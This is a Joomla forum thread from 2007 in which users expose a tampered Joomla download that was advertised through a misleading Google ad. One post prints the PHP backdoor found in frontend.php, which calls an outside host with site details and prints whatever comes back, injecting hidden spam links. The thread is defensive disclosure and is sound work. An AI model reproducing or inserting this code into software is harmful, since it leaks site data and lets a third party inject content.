Phishing site CONFIRMED

AlecWeb · Post by **AlecWeb** » Thu Jun 28, 2007 6:27 pm

Hi guys,

I found this site today: http://www.templatesbrowser.com/downloa ... UAodhhZbYQ
It was a commercial link in Google when I typed 'joomla' as keyword.

I wasn't able to check it, but I was thinking this could be a potential malicius file with a backdoor.

Just my 2 cents

Regards,
Alec

Post by **pe7er** » Thu Jun 28, 2007 7:42 pm

AlecWeb wrote:I wasn't able to check it, but I was thinking this could be a potential malicius file with a backdoor.

Yes, it's Joomla 1.0.12 indeed, but one file has been altered: /includes/frontend.php

The following (spyware?) code has been added to the file.
It's included in the function mosMainBody():
$url = "http://get.templatesbrowser.com/j.php?" .
"host=" . urlencode($_SERVER['HTTP_HOST']) . "&" . "url=" . urlencode($_SERVER['REQUEST_URI']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}

When the mosMainBody is run, the routine creates some URL variable with your server's hostname + your website's URL,
it tests if it is able to connect to the templatesbrowser's site.
If it is able to create a connection, then some URL (with your hostname + your website's URL) will be retrieved,
and templatebrowser can store statistics about your site.

Post by **pe7er** » Thu Jun 28, 2007 7:51 pm

I was looking for some more info regarding that website,
and I found an interesting article: http://www.onnoot.com/e/532/Templatesbr ... _WordPress

The article describes the same routine as I found in their Joomla's /includes/frontend.php
It includes hidden commercial links ("link spam") in your site, without your knowing!

btw: an interesting quote from the onnoot.com website:

Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We're not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google's search result pages.

Post by **rliskey** » Thu Jun 28, 2007 8:03 pm

A great example of why is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity

aruba · Post by **aruba** » Thu Jun 28, 2007 8:55 pm

rliskey wrote: A great example of why is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity

I've been beating the drum on this since last year

It can only get worse IMHO.

As Joomla gets more secure, you will see more and more ingenious ways to subvert that security.

No where is that more true than the templates and extensions directory.

I have always maintained that ALL GPL code submitted to the JED MUST be archived ON Jforge.
If there is to be a code update, it is communicated to JForge and the version number is incremented.

Even if Joomla does not supply the download and defers to the developer (who may want a link to their site and registration before you can download - a behavior I deplore), an archived copy can protect users from having spy code introduced to their machine.
After download, they can compare a generated checksum of the code from site 'X' with the Joomla archived version.

There is an incredible risk of hijack and coercive code being introduced to the community.

Note that the above code connects to the home site and loads HTML DATA, IT COULD EASILY HAVE LOADED CODE INSTEAD TO BE RUN IN THE CONTEXT OF YOUR SITE! ( by returning a string and executing an EVAL against it)

This is very serious news... I hope we can take time off the "GREAT GPL DEBATE DEBACLE" to handle it properly

AlecWeb · Post by **AlecWeb** » Thu Jun 28, 2007 11:24 pm

Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'):

It is an commercial/sponsered link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before to many users follow this link?

Anyway, thanks for the great piece of software!
(btw: I always use the real joomla.org to download Joomla!

Regards,
Alec

The screenshots:
http://alecweb.ulyssis.org/sponsered-link-2.png
http://alecweb.ulyssis.org/sponsered-link-joomla.png

Post by **pe7er** » Fri Jun 29, 2007 2:34 pm

AlecWeb wrote: Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'):

It is an commercial/sponsered link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before to many users follow this link?

The latest news:

The sponsored link @ Google is no longer there...
And the download link is 404.

Thanks to all who helped solving this issue
(& special thanks to Wordpress user Onnoot for his efforts)

The Joomla! Forum™